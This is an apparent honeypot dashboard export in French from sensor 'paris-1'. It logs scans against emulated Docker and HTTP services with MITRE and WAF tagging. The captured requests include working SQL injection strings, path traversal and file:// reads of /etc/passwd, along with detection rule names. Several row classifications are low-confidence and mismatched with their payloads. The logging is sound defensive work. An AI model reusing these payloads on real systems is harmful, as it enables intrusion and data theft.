GET /admin/ HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde Elasticsearch elasticsearch probe · via DOCKER:2375 · (sonde / probe) | Élevée | Moyen · 43 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /admin/ HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firef
Pourquoi cette classification : Type « elasticsearch_probe » (signaux protocolaires) · confiance 49%
Confiance classification
57%
Corrélation +8
Risque capteur
Moyen
· 43
Confiance : Confiance 49 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0341
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
ES admin GET
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /admin/ HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firef
Requête brute (extrait)
GET /admin/ HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 32 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1 Host: 62.3.50.
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 32
Confiance : Confiance 0 % — 5 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1 Host: 62.3.50.
Requête brute (extrait)
GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Saf |
|||||||
| TCP | 2375 · DOCKER | docker | Traversal LFI lfi path traversal · via DOCKER:2375 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Moyen
· 53
Confiance : Confiance 100 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
CRS-930100
MITRE-T1083
pat-0508
pat-0711
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET path traversal encoded
CRS 930100 path traversal
CRS 930160 etc passwd
CRS 930110
LFI Path traversal encoded
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win
Requête brute (extrait)
GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept: */* Accept-Language: en Accept-Enco |
|||||||
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /blast/nph-viewgif.cgi | Élevée | Élevé · 65 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /blast/nph-viewgif.cgi UA Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, lik…
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
GET
/blast/nph-viewgif.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/blast/nph-viewgif.cgi
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Élevé
· 65
Confiance : Confiance 100 % — Motif catalogue confirmé · 6 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100
MITRE-T1083
pat-0508
pat-0711
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET path traversal encoded
CRS 930100 path traversal
CRS 930160 etc passwd
CRS 930110
LFI Path traversal encoded
Ligne de requête
User-Agent
Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Fedora; Linux i686)
Requête brute (extrait)
GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 33 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET / HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gec
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 33
Confiance : Confiance 0 % — 6 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gec
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.107 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) | Élevée | Moyen · 48 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefo…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 62%
Confiance classification
70%
Corrélation +8
Risque capteur
Moyen
· 48
Confiance : Confiance 62 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0 Accep
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) · → /WidgetHandler.ashx | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /WidgetHandler.ashx UA Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like…
Émulateur
HTTP
WAF
50
Recommandation
Investiguer
Tags
Cible HTTP
GET
/WidgetHandler.ashx
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/WidgetHandler.ashx
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 29%
Confiance classification
36%
Corrélation +8
Risque capteur
Moyen
· 55
Confiance : Confiance 29 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36
Règles WAF
sqli-12
sqli-14
sqli-17
rce-0
rce-14
nosqli-3
Payload (extrait)
GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28
Requête brute (extrait)
GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTT |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 32 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 32
Confiance : Confiance 0 % — 5 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28
Requête brute (extrait)
GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTT |
|||||||
| TCP | 7001 · HTTP | http | probe api probe api · via HTTP:7001 · (sonde / probe) · → /api/config | Élevée | Moyen · 56 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /api/config UA Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/9.0
Émulateur
HTTP
WAF
23
Recommandation
Investiguer
Tags
Cible HTTP
GET
/api/config
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/api/config
Service
HTTP
Pourquoi cette classification : Type « probe_api » (signaux protocolaires) · confiance 50%
Confiance classification
58%
Corrélation +8
Risque capteur
Moyen
· 56
Confiance : Confiance 50 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/9.0
Règles WAF
rce-0
nosqli-3
k8s-api
Payload (extrait)
GET /api/config HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/9.0 Acce
Requête brute (extrait)
GET /api/config HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/9.0 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 33 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /api/config HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 33
Confiance : Confiance 0 % — 7 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /api/config HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Requête brute (extrait)
GET /api/config HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) · → /api/backup | Élevée | Moyen · 59 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /api/backup UA Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, lik…
Émulateur
HTTP
WAF
23
Recommandation
Investiguer
Tags
Cible HTTP
GET
/api/backup
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/api/backup
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 62%
Confiance classification
70%
Corrélation +8
Risque capteur
Moyen
· 59
Confiance : Confiance 62 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
k8s-api
Payload (extrait)
GET /api/backup HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Ge
Requête brute (extrait)
GET /api/backup HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 33 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /api/backup HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/14.0 Acc
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 33
Confiance : Confiance 0 % — 6 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /api/backup HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/14.0 Acc
Requête brute (extrait)
GET /api/backup HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/14.0 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Traversal LFI lfi path traversal · via DOCKER:2375 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh;
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Moyen
· 53
Confiance : Confiance 100 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930130 LFI
CRS 934110 file scheme
CRS 930160 etc passwd
SSRF file:// SSRF
LFI file:// wrapper
LFI Double-dot bypass
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh;
Requête brute (extrait)
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.25 (KHTML, like Gecko) Version/3.2 Safari/525.25 Accept: */* Accept-Language: |
|||||||
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15
Émulateur
HTTP
WAF
66
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Motif catalogue confirmé · 10 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930130 LFI
CRS 934110 file scheme
CRS 930160 etc passwd
SSRF file:// SSRF
LFI file:// wrapper
LFI Double-dot bypass
Ligne de requête
User-Agent
Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15
Règles WAF
lfi-1
lfi-7
rce-0
ssrf-3
nosqli-3
redir-1
sap-sapcontrol-path
ssrf-linklocal
Payload (extrait)
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (X11; Linux
Requête brute (extrait)
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) · → /albatross/saml/idpSelection | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1190
TA0001
TA0002
Protocole
GET /albatross/saml/idpSelection UA Mozilla/5.0 (Windows NT 6.2; rv:140.0.) Gecko/20100101 Firefox/…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/albatross/saml/idpSelection
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/albatross/saml/idpSelection
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
T1190
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 6.2; rv:140.0.) Gecko/20100101 Firefox/140.0.
Règles WAF
rce-0
rce-14
nosqli-3
Payload (extrait)
GET /albatross/saml/idpSelection?id=3HEiMSl5ibweFt87VXZ2KssoVxw&userName=admin HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozi
Requête brute (extrait)
GET /albatross/saml/idpSelection?id=3HEiMSl5ibweFt87VXZ2KssoVxw&userName=admin HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:140.0.) Gecko/20100101 Firefox/140.0. Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 32 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /albatross/saml/idpSelection?id=3HEiMSl5ibweFt87VXZ2KssoVxw&userName=admin HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozi
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 32
Confiance : Confiance 0 % — 5 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /albatross/saml/idpSelection?id=3HEiMSl5ibweFt87VXZ2KssoVxw&userName=admin HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozi
Requête brute (extrait)
GET /albatross/saml/idpSelection?id=3HEiMSl5ibweFt87VXZ2KssoVxw&userName=admin HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15 Accept: */* |
|||||||